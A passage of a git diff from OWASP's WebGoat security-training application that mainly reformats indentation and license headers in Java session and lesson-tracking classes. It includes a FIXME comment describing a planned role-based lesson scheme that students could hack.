-    public LessonTracker getLessonTracker(WebSession s, String userNameOverride)
-    {
-	UserTracker userTracker = UserTracker.instance();
-	return userTracker.getLessonTracker(s, userNameOverride, this);
-    }
-
-
-    public LessonTracker getLessonTracker(WebSession s, AbstractLesson lesson)
-    {
-	UserTracker userTracker = UserTracker.instance();
-	return userTracker.getLessonTracker(s, lesson);
-    }
-
-
-    /**
-     *  Fill in a descriptive title for this lesson
-     *
-     * @return    The title value
-     */
-    public abstract String getTitle();
-
-
-    protected void setContent(Element content)
-    {
-	this.content = content;
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @return    Description of the Return Value
-     */
-
-    protected Element makeLogo()
-    {
-
-	return new A("http://www.aspectsecurity.com/webgoat.html", logo);
-    }
-
-
-    public String getSponsor()
-    {
-	return "Aspect Security";
-    }
-
-
-    public String getSponsorLogoResource()
-    {
-	return "images/aspectlogo-horizontal-small.jpg";
-    }
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-
-    protected Element makeMessages(WebSession s)
-    {
-
-	if (s == null)
-	{
-
-	    return (new StringElement(""));
-	}
-
-	Font f = new Font().setColor(HtmlColor.RED);
-
-	String message = s.getMessage();
-
-	f.addElement(message);
-
-	return (f);
-    }
-
-
-    /**
-     *  Returns the content length of the the html.
-     *
-     */
-
-    public int getContentLength()
-    {
-	return content.toString().length();
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  out  Description of the Parameter
-     */
-
-    public void output(PrintWriter out)
-    {
-
-	// format output -- then send to printwriter
-
-	// otherwise we're doing way too much SSL encryption work
-
-	out.print(content.toString());
-
-    }
-
-
-    public String getContent()
-    {
-	return (content == null) ? "" : content.toString();
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  x  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-
-    protected static String pad(int x)
-    {
-
-	StringBuffer sb = new StringBuffer();
-
-	if (x < 10)
-	{
-
-	    sb.append(" ");
-
-	}
-
-	if (x < 100)
-	{
-
-	    sb.append(" ");
-
-	}
-
-	sb.append(x);
-
-	return (sb.toString());
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  token  Description of the Parameter
-     * @return        Description of the Return Value
-     */
-    protected static String convertMetachars(String token)
-    {
-
-	int mci = 0;
-
-	/*
-	 *  meta char array
-	 * 
-	 * FIXME: Removed the conversion of whitespace " " to "&nbsp" in order for the 
-	 * html to be automatically wrapped in client browser. It is better to add line 
-	 * length checking and only do "&nbsp" conversion in lines that won't exceed 
-	 * screen size, say less than 80 characters.     
+	/**
+	 * Description of the Field
 	 */
-	String[] metaChar = { "&", "<", ">", "\"", "\t",
-		System.getProperty("line.separator") };
+	public static int MAIN_SIZE = 375;
 
-	String[] htmlCode = { "&amp;", "&lt;", "&gt;", "&quot;", "    ", "<br>" };
+	// private Head head;
+	private Element content;
 
-	String replacedString = token;
-	for (; mci < metaChar.length; mci += 1)
+	final static IMG logo = new IMG("images/aspectlogo-horizontal-small.jpg").setAlt("Aspect Security").setBorder(0)
+			.setHspace(0).setVspace(0);
+
+	/**
+	 * Constructor for the Screen object
+	 */
+
+	public Screen()
 	{
-	    replacedString = replacedString.replaceAll(metaChar[mci],
-		    htmlCode[mci]);
 	}
-	return (replacedString);
-    }
 
+	// FIXME: Each lesson should have a role assigned to it. Each user/student
+	// should also have a role(s) assigned. The user would only be allowed
+	// to see lessons that correspond to their role. Eventually these roles
+	// will be stored in the internal database. The user will be able to hack
+	// into the database and change their role. This will allow the user to
+	// see the admin screens, once they figure out how to turn the admin switch on.
+	public abstract String getRole();
 
-    /**
-     *  Description of the Method
-     *
-     * @param  token  Description of the Parameter
-     * @return        Description of the Return Value
-     */
-    protected static String convertMetacharsJavaCode(String token)
-    {
-	return (convertMetachars(token).replaceAll(" ", "&nbsp;"));
-    }
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
 
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
+	protected abstract Element createContent(WebSession s);
 
-    //protected abstract Element wrapForm( WebSession s );
+	/**
+	 * Gets the credits attribute of the Screen object
+	 * 
+	 * @return The credits value
+	 */
+	public abstract Element getCredits();
+
+	/**
+	 * Creates a new lessonTracker object.
+	 * 
+	 * @param props
+	 *            The properties file that was used to persist the user data.
+	 * @return Description of the Return Value
+	 */
+
+	public LessonTracker createLessonTracker(Properties props)
+	{
+
+		// If the lesson had any specialized properties in the user persisted properties,
+		// now would be the time to pull them out.
+
+		return createLessonTracker();
+	}
+
+	/**
+	 * This allows the screens to provide a custom LessonTracker object if needed.
+	 * 
+	 * @return Description of the Return Value
+	 */
+	public LessonTracker createLessonTracker()
+	{
+		return new LessonTracker();
+	}
+
+	/**
+	 * Gets the lessonTracker attribute of the AbstractLesson object
+	 * 
+	 * @param userName
+	 *            Description of the Parameter
+	 * @return The lessonTracker value
+	 */
+
+	public LessonTracker getLessonTracker(WebSession s)
+	{
+		UserTracker userTracker = UserTracker.instance();
+		return userTracker.getLessonTracker(s, this);
+	}
+
+	public LessonTracker getLessonTracker(WebSession s, String userNameOverride)
+	{
+		UserTracker userTracker = UserTracker.instance();
+		return userTracker.getLessonTracker(s, userNameOverride, this);
+	}
+
+	public LessonTracker getLessonTracker(WebSession s, AbstractLesson lesson)
+	{
+		UserTracker userTracker = UserTracker.instance();
+		return userTracker.getLessonTracker(s, lesson);
+	}
+
+	/**
+	 * Fill in a descriptive title for this lesson
+	 * 
+	 * @return The title value
+	 */
+	public abstract String getTitle();
+
+	protected void setContent(Element content)
+	{
+		this.content = content;
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @return Description of the Return Value
+	 */
+
+	protected Element makeLogo()
+	{
+
+		return new A("http://www.aspectsecurity.com/webgoat.html", logo);
+	}
+
+	public String getSponsor()
+	{
+		return "Aspect Security";
+	}
+
+	public String getSponsorLogoResource()
+	{
+		return "images/aspectlogo-horizontal-small.jpg";
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
+	protected Element makeMessages(WebSession s)
+	{
+
+		if (s == null) {
+
+		return (new StringElement("")); }
+
+		Font f = new Font().setColor(HtmlColor.RED);
+
+		String message = s.getMessage();
+
+		f.addElement(message);
+
+		return (f);
+	}
+
+	/**
+	 * Returns the content length of the the html.
+	 * 
+	 */
+
+	public int getContentLength()
+	{
+		return content.toString().length();
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param out
+	 *            Description of the Parameter
+	 */
+
+	public void output(PrintWriter out)
+	{
+
+		// format output -- then send to printwriter
+
+		// otherwise we're doing way too much SSL encryption work
+
+		out.print(content.toString());
+
+	}
+
+	public String getContent()
+	{
+		return (content == null) ? "" : content.toString();
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param x
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
+	protected static String pad(int x)
+	{
+
+		StringBuffer sb = new StringBuffer();
+
+		if (x < 10)
+		{
+
+			sb.append(" ");
+
+		}
+
+		if (x < 100)
+		{
+
+			sb.append(" ");
+
+		}
+
+		sb.append(x);
+
+		return (sb.toString());
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param token
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected static String convertMetachars(String token)
+	{
+
+		int mci = 0;
+
+		/*
+		 * meta char array FIXME: Removed the conversion of whitespace " " to "&nbsp" in order for
+		 * the html to be automatically wrapped in client browser. It is better to add line length
+		 * checking and only do "&nbsp" conversion in lines that won't exceed screen size, say less
+		 * than 80 characters.
+		 */
+		String[] metaChar = { "&", "<", ">", "\"", "\t", System.getProperty("line.separator") };
+
+		String[] htmlCode = { "&amp;", "&lt;", "&gt;", "&quot;", "    ", "<br>" };
+
+		String replacedString = token;
+		for (; mci < metaChar.length; mci += 1)
+		{
+			replacedString = replacedString.replaceAll(metaChar[mci], htmlCode[mci]);
+		}
+		return (replacedString);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param token
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected static String convertMetacharsJavaCode(String token)
+	{
+		return (convertMetachars(token).replaceAll(" ", "&nbsp;"));
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
+	// protected abstract Element wrapForm( WebSession s );
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/SequentialLessonTracker.java b/main/project/JavaSource/org/owasp/webgoat/session/SequentialLessonTracker.java
index bf0e1102f..85937ceeb 100755
--- a/main/project/JavaSource/org/owasp/webgoat/session/SequentialLessonTracker.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/SequentialLessonTracker.java
@@ -1,39 +1,38 @@
+
 package org.owasp.webgoat.session;
 
 import java.util.Properties;
 
-public class SequentialLessonTracker extends LessonTracker {
 
-    private int currentStage = 1;
+public class SequentialLessonTracker extends LessonTracker
+{
 
+	private int currentStage = 1;
 
+	public int getStage()
+	{
+		return currentStage;
+	}
 
-    public int getStage()
-    {
-	return currentStage;
-    }
+	public void setStage(int stage)
+	{
+		currentStage = stage;
+	}
 
+	protected void setProperties(Properties props, Screen screen)
+	{
+		super.setProperties(props, screen);
+		currentStage = Integer.parseInt(props.getProperty(screen.getTitle() + ".currentStage"));
+	}
 
-    public void setStage(int stage)
-    {
-	currentStage = stage;
-    }
+	public void store(WebSession s, Screen screen, String user)
+	{
+		lessonProperties.setProperty(screen.getTitle() + ".currentStage", Integer.toString(currentStage));
+		super.store(s, screen, user);
+	}
 
-    protected void setProperties(Properties props, Screen screen)
-    {
-    super.setProperties(props, screen);
-	currentStage = Integer.parseInt(props.getProperty(screen.getTitle()
-		+ ".currentStage"));
-    }
-    
-    public void store(WebSession s, Screen screen, String user)
-    {
-	lessonProperties.setProperty(screen.getTitle() + ".currentStage",
-		Integer.toString(currentStage));
-	super.store(s, screen, user);
-    }
-    
-    public String toString() {
-    	return super.toString() + "    - currentStage:....... " + currentStage + "\n";
-    }
+	public String toString()
+	{
+		return super.toString() + "    - currentStage:....... " + currentStage + "\n";
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/UnauthenticatedException.java b/main/project/JavaSource/org/owasp/webgoat/session/UnauthenticatedException.java
index efd610750..3e73372f8 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/UnauthenticatedException.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/UnauthenticatedException.java
@@ -1,31 +1,30 @@
+
 package org.owasp.webgoat.session;
 
-/*******************************************************************************
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/UnauthorizedException.java b/main/project/JavaSource/org/owasp/webgoat/session/UnauthorizedException.java
index d05532419..eb25c482f 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/UnauthorizedException.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/UnauthorizedException.java
@@ -1,31 +1,30 @@
+
 package org.owasp.webgoat.session;
 
-/*******************************************************************************
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/UserTracker.java b/main/project/JavaSource/org/owasp/webgoat/session/UserTracker.java
index 91808d020..fd2b35ab0 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/UserTracker.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/UserTracker.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.session;
 
 import java.util.ArrayList;
@@ -5,269 +6,269 @@ import java.util.Collection;
 import java.util.HashMap;
 import java.util.Iterator;
 import java.util.Map;
-
 import org.apache.catalina.Role;
 import org.apache.catalina.User;
 import org.apache.catalina.users.MemoryUserDatabase;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created    October 29, 2003
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 29, 2003
  */
 
 public class UserTracker
 {
 
-    private static UserTracker instance;
+	private static UserTracker instance;
 
-    // FIXME: persist this somehow!
+	// FIXME: persist this somehow!
 
-    private static HashMap<String, HashMap<String, LessonTracker>> storage = new HashMap<String, HashMap<String, LessonTracker>>();
+	private static HashMap<String, HashMap<String, LessonTracker>> storage = new HashMap<String, HashMap<String, LessonTracker>>();
 
-    private static MemoryUserDatabase usersDB = new MemoryUserDatabase();
+	private static MemoryUserDatabase usersDB = new MemoryUserDatabase();
 
-
-    /**
-     *  Constructor for the UserTracker object
-     */
-    private UserTracker()
-    {}
-
-
-    /**
-     *  Gets the completed attribute of the UserTracker object
-     *
-     * @param  userName  Description of the Parameter
-     * @return           The completed value
-     */
-    public int getCompleted(String userName)
-    {
-
-	HashMap usermap = getUserMap(userName);
-
-	Iterator i = usermap.entrySet().iterator();
-
-	int count = 0;
-
-	while (i.hasNext())
+	/**
+	 * Constructor for the UserTracker object
+	 */
+	private UserTracker()
 	{
-
-	    Map.Entry entry = (Map.Entry) i.next();
-
-	    int value = ((Integer) entry.getValue()).intValue();
-
-	    if (value > 5)
-	    {
-		count++;
-	    }
-
 	}
 
-	return count;
-    }
-
-
-    /**
-     *  Gets the users attribute of the UserTracker object
-     *
-     * @return    The users value
-     */
-    public Collection getUsers()
-    {
-	return storage.keySet();
-    }
-
-
-    public Collection<String> getAllUsers(String roleName)
-    {
-	synchronized (usersDB)
+	/**
+	 * Gets the completed attribute of the UserTracker object
+	 * 
+	 * @param userName
+	 *            Description of the Parameter
+	 * @return The completed value
+	 */
+	public int getCompleted(String userName)
 	{
-	    Collection<String> allUsers = new ArrayList<String>();
-	    try
-	    {
-		usersDB.open();
-		Iterator users = usersDB.getUsers();
-		while (users.hasNext())
+
+		HashMap usermap = getUserMap(userName);
+
+		Iterator i = usermap.entrySet().iterator();
+
+		int count = 0;
+
+		while (i.hasNext())
 		{
-		    User user = (User) users.next();
-		    Iterator roles = user.getRoles();
-		    while (roles.hasNext())
-		    {
-			Role role = (Role) roles.next();
-			if (role.getRolename().trim().equals(roleName))
+
+			Map.Entry entry = (Map.Entry) i.next();
+
+			int value = ((Integer) entry.getValue()).intValue();
+
+			if (value > 5)
 			{
-			    allUsers.add(user.getUsername());
+				count++;
 			}
-		    }
+
 		}
-		usersDB.close();
-	    }
-	    catch (Exception e)
-	    {}
-	    return allUsers;
+
+		return count;
 	}
-    }
 
-
-    public void deleteUser(String user)
-    {
-	synchronized (usersDB)
+	/**
+	 * Gets the users attribute of the UserTracker object
+	 * 
+	 * @return The users value
+	 */
+	public Collection getUsers()
 	{
-	    try
-	    {
-		usersDB.open();
-		Iterator users = usersDB.getUsers();
-		while (users.hasNext())
+		return storage.keySet();
+	}
+
+	public Collection<String> getAllUsers(String roleName)
+	{
+		synchronized (usersDB)
 		{
-		    User tomcatUser = (User) users.next();
-		    if (tomcatUser.getUsername().equals(user))
-		    {
-			usersDB.removeUser(tomcatUser);
-			// FIXME: delete all the lesson tracking property files
-			break;
-		    }
+			Collection<String> allUsers = new ArrayList<String>();
+			try
+			{
+				usersDB.open();
+				Iterator users = usersDB.getUsers();
+				while (users.hasNext())
+				{
+					User user = (User) users.next();
+					Iterator roles = user.getRoles();
+					while (roles.hasNext())
+					{
+						Role role = (Role) roles.next();
+						if (role.getRolename().trim().equals(roleName))
+						{
+							allUsers.add(user.getUsername());
+						}
+					}
+				}
+				usersDB.close();
+			} catch (Exception e)
+			{
+			}
+			return allUsers;
 		}
-		usersDB.close();
-
-	    }
-	    catch (Exception e)
-	    {}
 	}
-    }
 
-
-    /**
-     *  Gets the lessonTracker attribute of the UserTracker object
-     *
-     * @param  screen    Description of the Parameter
-     * @param  userName  Description of the Parameter
-     * @return           The lessonTracker value
-     */
-    public LessonTracker getLessonTracker(WebSession s, Screen screen)
-    {
-	return getLessonTracker(s, s.getUserName(), screen);
-    }
-
-
-    public LessonTracker getLessonTracker(WebSession s, String user,
-	    Screen screen)
-    {
-	HashMap<String, LessonTracker> usermap = getUserMap(user);
-	LessonTracker tracker = (LessonTracker) usermap.get(screen.getTitle());
-	if (tracker == null)
+	public void deleteUser(String user)
 	{
-	    // Creates a new lesson tracker, if one does not exist on disk.
-	    tracker = LessonTracker.load(s, user, screen);
-	    usermap.put(screen.getTitle(), tracker);
+		synchronized (usersDB)
+		{
+			try
+			{
+				usersDB.open();
+				Iterator users = usersDB.getUsers();
+				while (users.hasNext())
+				{
+					User tomcatUser = (User) users.next();
+					if (tomcatUser.getUsername().equals(user))
+					{
+						usersDB.removeUser(tomcatUser);
+						// FIXME: delete all the lesson tracking property files
+						break;
+					}
+				}
+				usersDB.close();
+
+			} catch (Exception e)
+			{
+			}
+		}
 	}
-	//System.out.println( "User: [" + userName + "] UserTracker:getLessonTracker() LTH " + tracker.hashCode() + " for " + screen );
-	return tracker;
-    }
 
+	/**
+	 * Gets the lessonTracker attribute of the UserTracker object
+	 * 
+	 * @param screen
+	 *            Description of the Parameter
+	 * @param userName
+	 *            Description of the Parameter
+	 * @return The lessonTracker value
+	 */
+	public LessonTracker getLessonTracker(WebSession s, Screen screen)
+	{
+		return getLessonTracker(s, s.getUserName(), screen);
+	}
 
-    /**
-     *  Gets the status attribute of the UserTracker object
-     *
-     * @param  screen    Description of the Parameter
-     * @param  userName  Description of the Parameter
-     * @return           The status value
-     */
-    public String getStatus(WebSession s, Screen screen)
-    {
-	return ("User [" + s.getUserName() + "] has accessed " + screen
-		+ " UserTracker:getStatus()LTH = " + getLessonTracker(s, screen)
-		.hashCode());
-    }
+	public LessonTracker getLessonTracker(WebSession s, String user, Screen screen)
+	{
+		HashMap<String, LessonTracker> usermap = getUserMap(user);
+		LessonTracker tracker = (LessonTracker) usermap.get(screen.getTitle());
+		if (tracker == null)
+		{
+			// Creates a new lesson tracker, if one does not exist on disk.
+			tracker = LessonTracker.load(s, user, screen);
+			usermap.put(screen.getTitle(), tracker);
+		}
+		// System.out.println( "User: [" + userName + "] UserTracker:getLessonTracker() LTH " +
+		// tracker.hashCode() + "
+		// for " + screen );
+		return tracker;
+	}
 
+	/**
+	 * Gets the status attribute of the UserTracker object
+	 * 
+	 * @param screen
+	 *            Description of the Parameter
+	 * @param userName
+	 *            Description of the Parameter
+	 * @return The status value
+	 */
+	public String getStatus(WebSession s, Screen screen)
+	{
+		return ("User [" + s.getUserName() + "] has accessed " + screen + " UserTracker:getStatus()LTH = " + getLessonTracker(
+																																s,
+																																screen)
+				.hashCode());
+	}
 
-    /**
-     *  Gets the userMap attribute of the UserTracker object
-     *
-     * @param  userName  Description of the Parameter
-     * @return           The userMap value
-     */
-    private HashMap<String, LessonTracker> getUserMap(String userName)
-    {
-
-	HashMap<String, LessonTracker> usermap = storage.get(userName);
-
-	if (usermap == null)
+	/**
+	 * Gets the userMap attribute of the UserTracker object
+	 * 
+	 * @param userName
+	 *            Description of the Parameter
+	 * @return The userMap value
+	 */
+	private HashMap<String, LessonTracker> getUserMap(String userName)
 	{
 
-	    usermap = new HashMap<String, LessonTracker>();
+		HashMap<String, LessonTracker> usermap = storage.get(userName);
 
-	    storage.put(userName, usermap);
+		if (usermap == null)
+		{
 
+			usermap = new HashMap<String, LessonTracker>();
+
+			storage.put(userName, usermap);
+
+		}
+
+		return (usermap);
 	}
 
-	return (usermap);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @return    Description of the Return Value
-     */
-    public static synchronized UserTracker instance()
-    {
-
-	if (instance == null)
+	/**
+	 * Description of the Method
+	 * 
+	 * @return Description of the Return Value
+	 */
+	public static synchronized UserTracker instance()
 	{
 
-	    instance = new UserTracker();
+		if (instance == null)
+		{
 
+			instance = new UserTracker();
+
+		}
+
+		return instance;
 	}
 
-	return instance;
-    }
+	/**
+	 * Description of the Method
+	 * 
+	 * @param screen
+	 *            Description of the Parameter
+	 * @param s
+	 *            Description of the Parameter
+	 */
+	public void update(WebSession s, Screen screen)
+	{
 
+		LessonTracker tracker = getLessonTracker(s, screen);
 
-    /**
-     *  Description of the Method
-     *
-     * @param  screen  Description of the Parameter
-     * @param  s       Description of the Parameter
-     */
-    public void update(WebSession s, Screen screen)
-    {
+		// System.out.println( "User [" + s.getUserName() + "] TRACKER: updating " + screen + " LTH
+		// " +
+		// tracker.hashCode() );
+		tracker.store(s, screen);
 
-	LessonTracker tracker = getLessonTracker(s, screen);
+		HashMap<String, LessonTracker> usermap = getUserMap(s.getUserName());
+		usermap.put(screen.getTitle(), tracker);
 
-	//System.out.println( "User [" + s.getUserName() + "] TRACKER: updating " + screen + " LTH " + tracker.hashCode() );
-	tracker.store(s, screen);
-
-	HashMap<String, LessonTracker> usermap = getUserMap(s.getUserName());
-	usermap.put(screen.getTitle(), tracker);
-
-    }
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/ValidationException.java b/main/project/JavaSource/org/owasp/webgoat/session/ValidationException.java
index e34b28b2c..e7723a0b1 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/ValidationException.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/ValidationException.java
@@ -1,51 +1,48 @@
+
 package org.owasp.webgoat.session;
 
-/*******************************************************************************
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class ValidationException extends Exception
 {
 
-    /**
+	/**
 	 * 
 	 */
 	private static final long serialVersionUID = -8358754606830400708L;
 
-
 	public ValidationException()
-    {
-	super();
-    }
+	{
+		super();
+	}
 
-
-    public ValidationException(String message)
-    {
-	super(message);
-    }
+	public ValidationException(String message)
+	{
+		super(message);
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/WebSession.java b/main/project/JavaSource/org/owasp/webgoat/session/WebSession.java
index 3320558ea..a76cc35bf 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/WebSession.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/WebSession.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.session;
 
 import java.io.IOException;
@@ -13,43 +14,40 @@ import java.util.Hashtable;
 import java.util.List;
 import java.util.Map;
 import java.util.Vector;
-
 import javax.servlet.ServletContext;
 import javax.servlet.http.Cookie;
 import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
-
 import org.owasp.webgoat.lessons.AbstractLesson;
 import org.owasp.webgoat.lessons.Category;
 import org.owasp.webgoat.lessons.RandomLessonAdapter;
 import org.owasp.webgoat.lessons.SequentialLessonAdapter;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
